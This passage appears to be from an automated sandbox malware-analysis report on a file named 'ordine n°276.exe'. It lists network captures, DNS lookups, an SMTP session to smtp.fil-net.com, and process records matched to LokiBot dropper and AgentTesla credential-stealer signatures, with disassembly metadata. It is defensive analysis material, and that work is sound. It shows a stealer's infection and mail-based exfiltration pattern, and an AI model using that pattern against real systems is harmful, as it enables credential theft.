May 4, 2021 15:35:43.593529940 CEST	49765	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:43.654578924 CEST	587	49765	46.16.61.250	192.168.2.4
May 4, 2021 15:35:43.654685974 CEST	49765	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:43.815591097 CEST	587	49765	46.16.61.250	192.168.2.4
May 4, 2021 15:35:43.816262960 CEST	49765	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:43.876758099 CEST	587	49765	46.16.61.250	192.168.2.4
May 4, 2021 15:35:43.879950047 CEST	587	49765	46.16.61.250	192.168.2.4
May 4, 2021 15:35:43.880307913 CEST	49765	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:43.941596031 CEST	587	49765	46.16.61.250	192.168.2.4
May 4, 2021 15:35:43.967123032 CEST	49765	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:44.031121969 CEST	587	49765	46.16.61.250	192.168.2.4
May 4, 2021 15:35:44.031164885 CEST	587	49765	46.16.61.250	192.168.2.4
May 4, 2021 15:35:44.031182051 CEST	587	49765	46.16.61.250	192.168.2.4
May 4, 2021 15:35:44.031291008 CEST	49765	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:44.039139032 CEST	49765	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:44.104123116 CEST	587	49765	46.16.61.250	192.168.2.4
May 4, 2021 15:35:44.122227907 CEST	49765	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:44.193203926 CEST	587	49765	46.16.61.250	192.168.2.4
May 4, 2021 15:35:44.194614887 CEST	49765	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:44.256464005 CEST	587	49765	46.16.61.250	192.168.2.4
May 4, 2021 15:35:44.256948948 CEST	49765	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:44.331013918 CEST	587	49765	46.16.61.250	192.168.2.4
May 4, 2021 15:35:44.331489086 CEST	49765	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:44.393891096 CEST	587	49765	46.16.61.250	192.168.2.4
May 4, 2021 15:35:44.397301912 CEST	49765	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:44.461036921 CEST	587	49765	46.16.61.250	192.168.2.4
May 4, 2021 15:35:44.461741924 CEST	49765	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:44.531687975 CEST	587	49765	46.16.61.250	192.168.2.4
May 4, 2021 15:35:44.542149067 CEST	49765	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:44.542191029 CEST	49765	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:44.542313099 CEST	49765	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:44.542408943 CEST	49765	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:44.542560101 CEST	49765	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:44.602610111 CEST	587	49765	46.16.61.250	192.168.2.4
May 4, 2021 15:35:44.602694035 CEST	587	49765	46.16.61.250	192.168.2.4
May 4, 2021 15:35:44.602869034 CEST	49765	587	192.168.2.4	46.16.61.250
May 4, 2021 15:35:44.664539099 CEST	587	49765	46.16.61.250	192.168.2.4
May 4, 2021 15:35:44.768630981 CEST	587	49765	46.16.61.250	192.168.2.4
May 4, 2021 15:35:44.812397957 CEST	49765	587	192.168.2.4	46.16.61.250
May 4, 2021 15:36:44.770241976 CEST	587	49765	46.16.61.250	192.168.2.4
May 4, 2021 15:36:44.770344973 CEST	49765	587	192.168.2.4	46.16.61.250

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 4, 2021 15:32:40.045464993 CEST	54531	53	192.168.2.4	8.8.8.8
May 4, 2021 15:32:40.094208956 CEST	53	54531	8.8.8.8	192.168.2.4
May 4, 2021 15:32:40.954361916 CEST	49714	53	192.168.2.4	8.8.8.8
May 4, 2021 15:32:41.003158092 CEST	53	49714	8.8.8.8	192.168.2.4
May 4, 2021 15:32:41.736464977 CEST	58028	53	192.168.2.4	8.8.8.8
May 4, 2021 15:32:41.785149097 CEST	53	58028	8.8.8.8	192.168.2.4
May 4, 2021 15:32:42.659574986 CEST	53097	53	192.168.2.4	8.8.8.8
May 4, 2021 15:32:42.708424091 CEST	53	53097	8.8.8.8	192.168.2.4
May 4, 2021 15:32:42.896543026 CEST	49257	53	192.168.2.4	8.8.8.8
May 4, 2021 15:32:42.963821888 CEST	53	49257	8.8.8.8	192.168.2.4
May 4, 2021 15:32:43.541533947 CEST	62389	53	192.168.2.4	8.8.8.8
May 4, 2021 15:32:43.592067003 CEST	53	62389	8.8.8.8	192.168.2.4
May 4, 2021 15:32:44.592176914 CEST	49910	53	192.168.2.4	8.8.8.8
May 4, 2021 15:32:44.646218061 CEST	53	49910	8.8.8.8	192.168.2.4
May 4, 2021 15:32:46.039527893 CEST	55854	53	192.168.2.4	8.8.8.8
May 4, 2021 15:32:46.108371019 CEST	53	55854	8.8.8.8	192.168.2.4
May 4, 2021 15:32:47.007075071 CEST	64549	53	192.168.2.4	8.8.8.8
May 4, 2021 15:32:47.055928946 CEST	53	64549	8.8.8.8	192.168.2.4
May 4, 2021 15:32:48.739245892 CEST	63153	53	192.168.2.4	8.8.8.8
May 4, 2021 15:32:48.787933111 CEST	53	63153	8.8.8.8	192.168.2.4
May 4, 2021 15:32:49.873409986 CEST	52991	53	192.168.2.4	8.8.8.8
May 4, 2021 15:32:49.925098896 CEST	53	52991	8.8.8.8	192.168.2.4
May 4, 2021 15:32:50.810866117 CEST	53700	53	192.168.2.4	8.8.8.8
May 4, 2021 15:32:50.859603882 CEST	53	53700	8.8.8.8	192.168.2.4
May 4, 2021 15:32:51.947354078 CEST	51726	53	192.168.2.4	8.8.8.8
May 4, 2021 15:32:52.000696898 CEST	53	51726	8.8.8.8	192.168.2.4
May 4, 2021 15:32:53.351233959 CEST	56794	53	192.168.2.4	8.8.8.8
May 4, 2021 15:32:53.400072098 CEST	53	56794	8.8.8.8	192.168.2.4
May 4, 2021 15:32:54.265948057 CEST	56534	53	192.168.2.4	8.8.8.8
May 4, 2021 15:32:54.323062897 CEST	53	56534	8.8.8.8	192.168.2.4
May 4, 2021 15:32:55.132121086 CEST	56627	53	192.168.2.4	8.8.8.8
May 4, 2021 15:32:55.192071915 CEST	53	56627	8.8.8.8	192.168.2.4
May 4, 2021 15:32:56.250293016 CEST	56621	53	192.168.2.4	8.8.8.8
May 4, 2021 15:32:56.299580097 CEST	53	56621	8.8.8.8	192.168.2.4
May 4, 2021 15:32:57.100306988 CEST	63116	53	192.168.2.4	8.8.8.8
May 4, 2021 15:32:57.149581909 CEST	53	63116	8.8.8.8	192.168.2.4
May 4, 2021 15:32:57.967885971 CEST	64078	53	192.168.2.4	8.8.8.8
May 4, 2021 15:32:58.016633034 CEST	53	64078	8.8.8.8	192.168.2.4
May 4, 2021 15:33:15.147033930 CEST	64801	53	192.168.2.4	8.8.8.8
May 4, 2021 15:33:15.197618961 CEST	53	64801	8.8.8.8	192.168.2.4
May 4, 2021 15:33:29.537322044 CEST	61721	53	192.168.2.4	8.8.8.8
May 4, 2021 15:33:29.601537943 CEST	53	61721	8.8.8.8	192.168.2.4
May 4, 2021 15:33:35.353529930 CEST	51255	53	192.168.2.4	8.8.8.8
May 4, 2021 15:33:35.415411949 CEST	53	51255	8.8.8.8	192.168.2.4
May 4, 2021 15:33:43.406893015 CEST	61522	53	192.168.2.4	8.8.8.8
May 4, 2021 15:33:43.474893093 CEST	53	61522	8.8.8.8	192.168.2.4
May 4, 2021 15:33:44.503277063 CEST	52337	53	192.168.2.4	8.8.8.8
May 4, 2021 15:33:44.568542004 CEST	53	52337	8.8.8.8	192.168.2.4
May 4, 2021 15:33:49.157248974 CEST	55046	53	192.168.2.4	8.8.8.8
May 4, 2021 15:33:49.262083054 CEST	53	55046	8.8.8.8	192.168.2.4
May 4, 2021 15:33:50.119745970 CEST	49612	53	192.168.2.4	8.8.8.8
May 4, 2021 15:33:50.446191072 CEST	53	49612	8.8.8.8	192.168.2.4
May 4, 2021 15:33:51.255096912 CEST	49285	53	192.168.2.4	8.8.8.8
May 4, 2021 15:33:51.355187893 CEST	53	49285	8.8.8.8	192.168.2.4
May 4, 2021 15:33:51.914782047 CEST	50601	53	192.168.2.4	8.8.8.8
May 4, 2021 15:33:51.954771042 CEST	60875	53	192.168.2.4	8.8.8.8
May 4, 2021 15:33:51.976136923 CEST	53	50601	8.8.8.8	192.168.2.4
May 4, 2021 15:33:52.023849010 CEST	53	60875	8.8.8.8	192.168.2.4
May 4, 2021 15:33:52.544280052 CEST	56448	53	192.168.2.4	8.8.8.8
May 4, 2021 15:33:52.603557110 CEST	53	56448	8.8.8.8	192.168.2.4
May 4, 2021 15:33:53.198702097 CEST	59172	53	192.168.2.4	8.8.8.8
May 4, 2021 15:33:53.255937099 CEST	53	59172	8.8.8.8	192.168.2.4
May 4, 2021 15:33:54.143522978 CEST	62420	53	192.168.2.4	8.8.8.8
May 4, 2021 15:33:54.203474998 CEST	53	62420	8.8.8.8	192.168.2.4
May 4, 2021 15:33:54.948461056 CEST	60579	53	192.168.2.4	8.8.8.8
May 4, 2021 15:33:55.007996082 CEST	53	60579	8.8.8.8	192.168.2.4
May 4, 2021 15:33:55.889342070 CEST	50183	53	192.168.2.4	8.8.8.8
May 4, 2021 15:33:55.949563980 CEST	53	50183	8.8.8.8	192.168.2.4
May 4, 2021 15:33:56.185600996 CEST	61531	53	192.168.2.4	8.8.8.8
May 4, 2021 15:33:56.245059013 CEST	53	61531	8.8.8.8	192.168.2.4
May 4, 2021 15:33:56.407876015 CEST	49228	53	192.168.2.4	8.8.8.8
May 4, 2021 15:33:56.456758022 CEST	53	49228	8.8.8.8	192.168.2.4
May 4, 2021 15:34:26.118033886 CEST	59794	53	192.168.2.4	8.8.8.8
May 4, 2021 15:34:26.166835070 CEST	53	59794	8.8.8.8	192.168.2.4
May 4, 2021 15:34:27.903454065 CEST	55916	53	192.168.2.4	8.8.8.8
May 4, 2021 15:34:27.969216108 CEST	53	55916	8.8.8.8	192.168.2.4
May 4, 2021 15:35:13.105088949 CEST	52752	53	192.168.2.4	8.8.8.8
May 4, 2021 15:35:13.170341015 CEST	53	52752	8.8.8.8	192.168.2.4
May 4, 2021 15:35:34.531362057 CEST	60542	53	192.168.2.4	8.8.8.8
May 4, 2021 15:35:34.588290930 CEST	53	60542	8.8.8.8	192.168.2.4
May 4, 2021 15:37:35.214534998 CEST	60689	53	192.168.2.4	8.8.8.8
May 4, 2021 15:37:35.275285959 CEST	53	60689	8.8.8.8	192.168.2.4
May 4, 2021 15:37:35.884021044 CEST	64206	53	192.168.2.4	8.8.8.8
May 4, 2021 15:37:35.953700066 CEST	53	64206	8.8.8.8	192.168.2.4
May 4, 2021 15:37:39.018558979 CEST	50904	53	192.168.2.4	8.8.8.8
May 4, 2021 15:37:39.090518951 CEST	53	50904	8.8.8.8	192.168.2.4
May 4, 2021 15:37:42.572835922 CEST	57525	53	192.168.2.4	8.8.8.8
May 4, 2021 15:37:42.646023035 CEST	53	57525	8.8.8.8	192.168.2.4
May 4, 2021 15:37:43.007853031 CEST	53814	53	192.168.2.4	8.8.8.8
May 4, 2021 15:37:43.064872026 CEST	53	53814	8.8.8.8	192.168.2.4
May 4, 2021 15:39:58.554929018 CEST	53418	53	192.168.2.4	8.8.8.8
May 4, 2021 15:39:58.617453098 CEST	53	53418	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 4, 2021 15:33:44.503277063 CEST	192.168.2.4	8.8.8.8	0xfb42	Standard query (0)	doc-10-9k-docs.googleusercontent.com	A (IP address)	IN (0x0001)
May 4, 2021 15:35:13.105088949 CEST	192.168.2.4	8.8.8.8	0x881d	Standard query (0)	smtp.fil-net.com	A (IP address)	IN (0x0001)
May 4, 2021 15:35:34.531362057 CEST	192.168.2.4	8.8.8.8	0x53eb	Standard query (0)	smtp.fil-net.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 4, 2021 15:33:44.568542004 CEST	8.8.8.8	192.168.2.4	0xfb42	No error (0)	doc-10-9k-docs.googleusercontent.com	googlehosted.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
May 4, 2021 15:33:44.568542004 CEST	8.8.8.8	192.168.2.4	0xfb42	No error (0)	googlehosted.l.googleusercontent.com		216.58.212.129	A (IP address)	IN (0x0001)
May 4, 2021 15:35:13.170341015 CEST	8.8.8.8	192.168.2.4	0x881d	No error (0)	smtp.fil-net.com		46.16.61.250	A (IP address)	IN (0x0001)
May 4, 2021 15:35:34.588290930 CEST	8.8.8.8	192.168.2.4	0x53eb	No error (0)	smtp.fil-net.com		46.16.61.250	A (IP address)	IN (0x0001)
May 4, 2021 15:37:35.275285959 CEST	8.8.8.8	192.168.2.4	0xf915	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
May 4, 2021 15:33:44.662986040 CEST	216.58.212.129	443	192.168.2.4	49745	CN=*.googleusercontent.com CN=GTS CA 1C3, O=Google Trust Services LLC, C=US CN=GTS Root R1, O=Google Trust Services LLC, C=US	CN=GTS CA 1C3, O=Google Trust Services LLC, C=US CN=GTS Root R1, O=Google Trust Services LLC, C=US CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE	Tue Apr 13 12:41:17 CEST 2021 Thu Aug 13 02:00:42 CEST 2020 Fri Jun 19 02:00:42 CEST 2020	Tue Jul 06 12:41:16 CEST 2021 Thu Sep 30 02:00:42 CEST 2027 Fri Jan 28 01:00:42 CET 2028	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
					CN=GTS CA 1C3, O=Google Trust Services LLC, C=US	CN=GTS Root R1, O=Google Trust Services LLC, C=US	Thu Aug 13 02:00:42 CEST 2020	Thu Sep 30 02:00:42 CEST 2027
					CN=GTS Root R1, O=Google Trust Services LLC, C=US	CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BE	Fri Jun 19 02:00:42 CEST 2020	Fri Jan 28 01:00:42 CET 2028

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
May 4, 2021 15:35:43.815591097 CEST	587	49765	46.16.61.250	192.168.2.4	220 vxsys-smtpclusterma-06.srv.cat ESMTP
May 4, 2021 15:35:43.816262960 CEST	49765	587	192.168.2.4	46.16.61.250	EHLO 468325
May 4, 2021 15:35:43.879950047 CEST	587	49765	46.16.61.250	192.168.2.4	250-vxsys-smtpclusterma-06.srv.cat 250-PIPELINING 250-SIZE 47185920 250-ETRN 250-STARTTLS 250-AUTH LOGIN PLAIN CRAM-MD5 DIGEST-MD5 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
May 4, 2021 15:35:43.880307913 CEST	49765	587	192.168.2.4	46.16.61.250	STARTTLS
May 4, 2021 15:35:43.941596031 CEST	587	49765	46.16.61.250	192.168.2.4	220 2.0.0 Ready to start TLS

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ordine n#U00b0 276.exe PID: 6888 Parent PID: 5912

General

Start time:	15:32:46
Start date:	04/05/2021
Path:	C:\Users\user\Desktop\ordine n#U00b0 276.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\ordine n#U00b0 276.exe'
Imagebase:	0x400000
File size:	98304 bytes
MD5 hash:	10F03C95BA280CD5A82146269F89CA9D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp, Author: Florian Roth Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 00000000.00000000.643378031.000000000040C000.00000020.00020000.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Analysis Process: RegAsm.exe PID: 1280 Parent PID: 6888

General

Start time:	15:33:17
Start date:	04/05/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\ordine n#U00b0 276.exe'
Imagebase:	0xbe0000
File size:	53248 bytes
MD5 hash:	529695608EAFBED00ACA9E61EF333A7C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1731275850.000000001DD01000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1731275850.000000001DD01000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6896 Parent PID: 1280

General

Start time:	15:33:18
Start date:	04/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: ordine n#U00b0 276.exe PID: 6888 Parent PID: 5912 ordine n#U00b0 276.exeCOMMON

Execution Graph

Execution Coverage:	6.9%
Dynamic/Decrypted Code Coverage:	2.3%
Signature Coverage:	2.2%
Total number of Nodes:	642
Total number of Limit Nodes:	116

Executed Functions

Function 00404746, Relevance: 47.0, APIs: 1, Strings: 30, Instructions: 529
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Strings

====, xrefs: 00404790
====, xrefs: 004047BD
====, xrefs: 004047C7
====, xrefs: 0040478B
====, xrefs: 00404754
====, xrefs: 004047D6
====, xrefs: 00404786
====, xrefs: 0040476D
====, xrefs: 00404781
====, xrefs: 00404759
====, xrefs: 0040474F
====, xrefs: 00404763
====, xrefs: 0040479F
====, xrefs: 004047AE
====, xrefs: 004047B8
====, xrefs: 004047CC
====, xrefs: 004047D1
====, xrefs: 00404795
====, xrefs: 004047A4
====, xrefs: 004047DB
====, xrefs: 00404772
====, xrefs: 0040474A
====, xrefs: 004047C2
====, xrefs: 0040477C
====, xrefs: 0040479A
====, xrefs: 004047B3
====, xrefs: 0040475E
====, xrefs: 00404768
====, xrefs: 004047A9
====, xrefs: 00404777

Memory Dump Source

Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: ====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====
API String ID: 4275171209-678356134
Opcode ID: 3a5876b740b61043a6dfa0dc728ab924d322831a8743a33b72832fffa009b4d2
Instruction ID: fbf3f0a8b09d1057fc37d39a2075e66043d6fbe8c0fe7386123008c07a913bba
Opcode Fuzzy Hash: 3a5876b740b61043a6dfa0dc728ab924d322831a8743a33b72832fffa009b4d2
Instruction Fuzzy Hash: 30B15962B1AB000B875D94BE99D096790C39FDE250239E63D252EF33A9FD79CD4A054C

Uniqueness

Uniqueness Score: -1.00%

Function 004039C7, Relevance: 2.8, APIs: 1, Instructions: 1560COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f8d9c7706a87d3193b948298e70c7d89d6cec1f54b762036c27f36034aa381c
Instruction ID: d55afde535935a96497b7aee2788d25533d00d58dfe5069dbd7c0a335e17a20e
Opcode Fuzzy Hash: 1f8d9c7706a87d3193b948298e70c7d89d6cec1f54b762036c27f36034aa381c
Instruction Fuzzy Hash: C372F211F1960007CB2D8C7E4485527ACDB8BEA32663891BF929DF73E6E97D9E0B050D

Uniqueness

Uniqueness Score: -1.00%

Function 004037CB, Relevance: 2.4, APIs: 1, Instructions: 1137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6487c0f73c7dbbd1879dfec40302840c37c895b982b81a264d5ea800d2cb642
Instruction ID: 4b6931673095879613408aba442fe958ae460836d94d567a29f30bd2fe136a16
Opcode Fuzzy Hash: a6487c0f73c7dbbd1879dfec40302840c37c895b982b81a264d5ea800d2cb642
Instruction Fuzzy Hash: 3B424C62B1A7000B875E94BE98D0966D1C39FEE251229E63D252EF73A9FD79CC0B114C

Uniqueness

Uniqueness Score: -1.00%

Function 004038C1, Relevance: 2.4, APIs: 1, Instructions: 1107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fc58fffb16a4b88898b376a53053bf93dbd3e592f3998a9203a9eb83cdaf1ec
Instruction ID: d9ea5dec187e375e832bf230f633702c753fd33cb281de4db3c8c2838a03fa7d
Opcode Fuzzy Hash: 6fc58fffb16a4b88898b376a53053bf93dbd3e592f3998a9203a9eb83cdaf1ec
Instruction Fuzzy Hash: 63324C62F1A7000B875E94BE98D0966D0C39FEE251229E63D252EF73A9FD79CC4B114C

Uniqueness

Uniqueness Score: -1.00%

Function 0040377D, Relevance: 2.3, APIs: 1, Instructions: 1096
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2ba2d8af27b522e369922de7630f2143d687852f6d0cf410c2898cdd05ffbc9
Instruction ID: 1618109241188de27ecc66ee0b1c0c968d37e52153f28cd3e00acd4b5a3d80a1
Opcode Fuzzy Hash: a2ba2d8af27b522e369922de7630f2143d687852f6d0cf410c2898cdd05ffbc9
Instruction Fuzzy Hash: 21424C62B1A7000B875E94BE98D0966D0C39FEE251229E63D252EF73A9FD79CD0B114C

Uniqueness

Uniqueness Score: -1.00%

Function 00403CB3, Relevance: 2.2, APIs: 1, Instructions: 963
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a4b192ac25ce7840c8009f00ce6af8122f33197cff2d754367970ebc823fddb
Instruction ID: ca2cfb47e39dc40fb754d2fdf71e1478f5b8d45c84d622d07597d31ab9b6bf20
Opcode Fuzzy Hash: 7a4b192ac25ce7840c8009f00ce6af8122f33197cff2d754367970ebc823fddb
Instruction Fuzzy Hash: 9B223B62F197000B875E94BE98D0966D0C39FEE250269E63D252EF73A9FD79CC4B124C

Uniqueness

Uniqueness Score: -1.00%

Function 00403D9F, Relevance: 2.2, APIs: 1, Instructions: 921
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 286f4b30340904fb1e4caea19aacad11ceab8e611f7d3af71713289ce5e2c6ed
Instruction ID: 0bd49bbd1d32d64dc31dc5bbc2a1f3ccad7de1366681ff1e82069e52d0379500
Opcode Fuzzy Hash: 286f4b30340904fb1e4caea19aacad11ceab8e611f7d3af71713289ce5e2c6ed
Instruction Fuzzy Hash: 33123C62F1A7000B875E94BE98D0966D0C39FEE250269E63D252DF73A9FD79CC4B124C

Uniqueness

Uniqueness Score: -1.00%

Function 0040408E, Relevance: 2.1, APIs: 1, Instructions: 898
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.772102689.0000000000403000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.772091293.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.772097573.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772141814.000000000040C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.772151447.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.772168489.0000000000417000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ordine n#U00b0 276.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05ac722583074ecdf66cfa0e85586aa877121cb15afc4331a42009ecf5061d8c
Instruction ID: ebda6499dc2f431bb01e7fcdc5c570d5d3a09506cbf7b3da258617ff0e81529c
Opcode Fuzzy Hash: 05ac722583074ecdf66cfa0e85586aa877121cb15afc4331a42009ecf5061d8c
Instruction Fuzzy Hash: BF024B62F1A7000B875E94BE98D0966D0C39FDE25027AE63D252EF73A9FD79CC4A114C

Uniqueness

Uniqueness Score: -1.00%

Function 00404263, Relevance: 2.1, APIs: 1, Instructions: 836
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,0000A000,-00000001001A0436,-00000002FFF96E09), ref: 0040507E

Memory Dump Source
